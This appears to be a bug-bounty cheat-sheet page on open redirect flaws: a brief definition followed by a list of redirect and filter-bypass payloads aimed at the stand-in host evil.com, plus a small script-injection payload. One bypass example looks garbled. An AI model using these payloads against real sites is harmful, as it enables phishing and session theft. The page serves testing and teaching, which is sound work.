# 9. Open Redirect

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect>" %}

{% embed url="<https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md>" %}

An open redirect vulnerability occurs when a web application or server uses unvalidated, user-supplied input to redirect users to other sites. This can allow an attacker to craft a link to the vulnerable site which redirects to a malicious site of their choosing. Attackers can leverage this vulnerability in phishing campaigns, session theft, or forcing a user to perform an action without their consent.

```
https://example.com/redirect?url=https://userpreferredsite.com
https://example.com?redirect_to=https://                %22%20accesskey%3dx%20onclick%3dalert(1)%2f%2f

location="http://exodussec.com"

document.location = "http://google.com"

document.location.href="http://google.com"

window.location.assign("http://google.com")

window['location']['href']="http://google.com"

window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';

```

&#x20;                                                                      **Open redirect bypasses**

Simply try to change the domain:&#x20;

```
?redirect=https://example.com --> ?redirect=https://evil.com
```

Bypass the filter when protocol is blacklisted using //

```
?redirect=https://example.com --> ?redirect=//evil.com
```

Bypass the filter when double slash is blacklisted using \\\\

```
?redirect=https://example.com --> ?redirect=levil.com
```

Bypass the filter when double slash is blacklisted using http: or https:

```
?redirect=https://example.com --> ?redirect=https:example.com
```

Bypass the filter using %40

```
?redirect=example.com --> ?redirect=example.com%40evil.com
```

Bypass the filter if it only checks for domain name

```
?redirect=example.com --> ?redirect=example.comevil.com
```

Bypass the filter if it only checks for domain name using a dot %2e

```
?redirect=example.com --> ?redirect=example.com%2eevil.com
```

Bypass the filter if it only checks for domain name using a query/question mark ?

```
?redirect=example.com --> ?redirect=evil.com?example.com
```

Bypass the filter if it only checks for domain name using a hash %23

```
?redirect=example.com --> ?redirect=evil.com%23example.com
```

Bypass the filter using a symbol

```
?redirect=example.com --> ?redirect=example.com/°evil.com
```

Bypass the filter using a url encoded Chinese dot %E3%80%82

```
?redirect=example.com --> ?redirect=evil.com%E3%80%82%23example.com
```

Bypass the filter if it only allows you to control the path using a nullbyte %0d or %0a

```
?redirect=/ --> ?redirect=/%0d/evil.com
```